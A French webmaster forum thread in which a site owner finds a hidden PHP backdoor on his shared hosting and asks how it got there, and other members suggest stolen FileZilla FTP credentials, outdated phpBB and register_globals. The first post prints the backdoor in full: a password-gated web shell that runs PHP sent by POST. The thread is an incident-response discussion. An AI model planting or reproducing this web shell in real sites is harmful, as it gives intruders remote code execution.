Webmaster Hub: Mon site a été hacké, comment trouver la faille - Webmaster Hub

Aller au contenu

Page 1 sur 1
  • Vous ne pouvez pas commencer un sujet
  • Vous ne pouvez pas répondre à ce sujet

Mon site a été hacké, comment trouver la faille Noter : -----

#1 L'utilisateur est hors-ligne   Pat AfterMoon 

  • Groupe : Hubmaster
  • Messages : 106
  • Inscrit(e) : 26-novembre 07
  • Genre:Homme
  • Localisation:Vercors

Posté 02 septembre 2010 - 19:59

Bonjour,

Ce soir me connectant à mon site web par FTP j'ai découvert un truc que je n'avais jamais vu. Un répertoire a été créé avec un fichier PHP dedans, cela ressemble a un hack capable d'exécuter un code PHP transmis à distance.

Le répertoire s'appelait "hammerda" et le fichier 5bfa44.php.

Le contenu du fichier était le suivant :
<? if ( md5($_POST["PARAM_HASH"]) == "d673f1f28d9cddf84ad8aeb58d430b8e" ){ ?>
<? if(get_magic_quotes_gpc() == 1){ ?>
<? $post = stripslashes($_POST["f"]) ?>
<? }else{ ?><? $post = $_POST["f"] ?>
<? } ?>
<? $test_func = create_function("", $post) ?>
<? $test_func() ?>
<? } ?>
<? die ?>


D'après ce que j'en comprends cela permet d'envoyer du code source PHP à distance et de l'exécuter directement. Il y a même un système de protection pour éviter que n'importe qui utilise le script (en tout cas c'est comme ça que je comprends le PARAM_HASH).
J'imagine que cela permet d'envoyer du spam depuis mon serveur ou d'attaquer mon site depuis l'intérieur.

Bien sur j'ai effacé tout ça, mais je me demande comment le hackeur a réussi a le mettre chez moi.

Pour info, j'ai un hébergement mutualisé, PHP, MySQL, plusieurs scripts maison et un forum phpBB.

Ce message a été modifié par Pat AfterMoon - 02 septembre 2010 - 20:13.

Acid Islands : Shooter 3D, WIP, Unity
COOP or DIE : coopérer ou périr pour Quake 2
0

#2 L'utilisateur est hors-ligne   captain_torche 

  • Danacol / Orangina rouge
  • Voir le blog
  • Groupe : Admin
  • Messages : 6 722
  • Inscrit(e) : 08-février 06
  • Genre:Homme
  • Localisation:Savigny / Orge

Posté 02 septembre 2010 - 20:07

Première chose à faire : modifier tes mots de passe BDD et FTP.
Ensuite, mets phpBB à jour, si ce n'est pas déjà fait.
Vous avez rêvé cette nuit ? Partagez vos rêves sur l'Onironaute !
Bijoux fantaisie
Recherche nounou
0

#3 L'utilisateur est hors-ligne   Bigb06 

  • Groupe : Hubmaster
  • Messages : 260
  • Inscrit(e) : 16-août 07
  • Genre:Homme
  • Localisation:Carro, Martigues
  • Société:Allogarage

Posté 04 septembre 2010 - 10:40

Effectivement, ca fait peur!

Il y a pas mal de problèmes en ce moment avec des comptes Filezilla piratés, est ce que c'est votre cas?
Rechercher un garage auto grâce aux avis des internautes : Allogarage.fr
Garages à Nice
Garages à Paris
0

#4 L'utilisateur est hors-ligne   Pat AfterMoon 

  • Groupe : Hubmaster
  • Messages : 106
  • Inscrit(e) : 26-novembre 07
  • Genre:Homme
  • Localisation:Vercors

Posté 04 septembre 2010 - 20:38

Voir le messageBigb06, le 04 septembre 2010 - 10:40, dit :

Il y a pas mal de problèmes en ce moment avec des comptes Filezilla piratés

J'utilise Filezilla comme client FTP, mais quel est le rapport ? Quelle est cette histoire de "compte Filezilla piratés" ?

Je n'ai pas de "compte" FileZilla, par contre j'ai un compte FTP pour accéder à mon site web, et jusqu'à maintenant j'avais gardé le mot de passe attribué par défaut par OVH.
Acid Islands : Shooter 3D, WIP, Unity
COOP or DIE : coopérer ou périr pour Quake 2
0

#5 L'utilisateur est hors-ligne   Bigb06 

  • Groupe : Hubmaster
  • Messages : 260
  • Inscrit(e) : 16-août 07
  • Genre:Homme
  • Localisation:Carro, Martigues
  • Société:Allogarage

Posté 04 septembre 2010 - 20:40

Voir le messagePat AfterMoon, le 04 septembre 2010 - 20:38, dit :

J'utilise Filezilla comme client FTP, mais quel est le rapport ? Quelle est cette histoire de "compte Filezilla piratés" ?

Je n'ai pas de "compte" FileZilla, par contre j'ai un compte FTP pour accéder à mon site web, et jusqu'à maintenant j'avais gardé le mot de passe attribué par défaut par OVH.


Parce que de nombreux "virus" s'attaquent aux comptes sauvegardés sur le PC.
Rechercher un garage auto grâce aux avis des internautes : Allogarage.fr
Garages à Nice
Garages à Paris
0

#6 L'utilisateur est hors-ligne   Jeanluc 

  • Groupe : Fondateur
  • Messages : 2 000
  • Inscrit(e) : 04-octobre 04
  • Genre:Homme
  • Localisation:Bruxelles

Posté 05 septembre 2010 - 09:36

Bonjour,

Si tu demandes à FileZilla d'enregistrer des noms d'utilisateurs et des mots de passe FTP, il les enregistre en clair dans un fichier du PC. Si un agresseur peut accéder à ce fichier au moyen d'un logiciel espion, il obtient la liste des utilisateurs et mots de passe stockés par FileZilla dans ton PC.

Maintenant, il faut bien que FileZilla les stocke quelque part, à moins qu'on ne veuille les retaper à chaque connexion, mais alors on choisira probablement des mots de passe toujours les mêmes ou plus faciles à deviner.

En principe, avec un bon antivirus avec mises à jour automatiques, on évite de voir son PC contrôler par une personne malveillante.

Ici, c'est probablement impossible de trouver l'origine exacte de la faille. Je pense que captain_torche a bien résumé la situation. Il faut changer les mots de passe (je suppose que tu l'as fait entretemps) et utiliser les versions à jour des logiciels. Si cela ne suffit pas, il faudra tout réinstaller à partir d'originaux sains.

Jean-Luc
Liste de + de 150 annuaires FreeGlobes et autres listes d'annuaires pour le référencement.
Testeur de redirection (301, 302, meta refresh,...)
Le Grand Annuaire : comme DMOZ, mais avec indexation super-rapide
0

#7 L'utilisateur est hors-ligne   Bigb06 

  • Groupe : Hubmaster
  • Messages : 260
  • Inscrit(e) : 16-août 07
  • Genre:Homme
  • Localisation:Carro, Martigues
  • Société:Allogarage

Posté 05 septembre 2010 - 09:54

Bien sur Filezilla doit stocker les mots de passe, c'est logique. Ce que je veux dire c'est que sur PC Filezilla est aujourd'hui le client FTP le plus populaire et que des outils automatisés existent.
Rechercher un garage auto grâce aux avis des internautes : Allogarage.fr
Garages à Nice
Garages à Paris
0

#8 L'utilisateur est hors-ligne   paolodelmare 

  • Groupe : Hubmaster
  • Messages : 274
  • Inscrit(e) : 19-février 09
  • Genre:Homme
  • Localisation:toulon

Posté 06 septembre 2010 - 19:44

Filezilla stocke les mdp en clair. Il suffit de visiter le forum de fz pour voir que le problème de vol de mdp est courant.
Entrainement trail
Rendre à la communauté un peu de ce qu'elle m'a donné.
0

#9 L'utilisateur est hors-ligne   Pat AfterMoon 

  • Groupe : Hubmaster
  • Messages : 106
  • Inscrit(e) : 26-novembre 07
  • Genre:Homme
  • Localisation:Vercors

Posté 06 septembre 2010 - 20:18

Merci pour vos réponses, mais vous m'avez rendu complètement parano :(

Ce qui m'embête c'est que je ne saurai jamais quelle est vraiment la faille sur ce coup. Ce qui m'inquiète le plus c'est mes scripts maison, car je ne maintiens plus trop ce site et que les risques de failles sont nombreux.

En tout cas à l'avenir si j'ai un nouveau site à faire je vais peux être revoir ma stratégie vis à vis de la formule Pro multi-domaine d'OVH. Parce sur ce coup la, avec un site hacké, c'est tous mes site qui sont exposés.

Par contre j'ai remplacé le script du hackeur par un script à moi qui stocke des infos en cas d'accès, et pour l'instant je n'ai eu aucun hit. Peut être que le script n'est utilisé qu'une seule fois juste après avoir été introduit. C'est dommage, j'aurais bien aimé voir l'adresse IP et le mot de passe :whistling:

Mais s'ils avaient poussé le vice jusqu'à effacer le script, je ne me serais même pas rendu compte de quoi que ce soit.
Acid Islands : Shooter 3D, WIP, Unity
COOP or DIE : coopérer ou périr pour Quake 2
0

#10 L'utilisateur est hors-ligne   BonBackLink 

  • Groupe : Hubmaster
  • Messages : 371
  • Inscrit(e) : 22-février 07
  • Genre:Homme

Posté 10 septembre 2010 - 08:58

Vérifie également que ton register global soit à off.

A plus.
site de ski alpin avec un forum - forum kitesurf
Pour un meilleur référencement inscrivez vous dans cet annuaire pour le sport et webmaster
0

Partager ce sujet :


Page 1 sur 1
  • Vous ne pouvez pas commencer un sujet
  • Vous ne pouvez pas répondre à ce sujet

1 utilisateur(s) en train de lire ce sujet
0 membre(s), 1 invité(s), 0 utilisateur(s) anonyme(s)